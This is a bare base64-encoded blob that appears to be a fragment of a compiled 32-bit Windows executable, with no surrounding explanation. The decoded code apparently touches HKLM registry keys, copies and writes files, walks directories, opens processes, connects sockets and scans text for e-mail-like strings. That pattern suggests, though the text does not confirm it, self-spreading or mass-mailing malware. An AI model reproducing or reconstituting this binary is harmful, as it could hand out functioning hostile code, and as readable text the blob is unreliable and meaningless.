 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
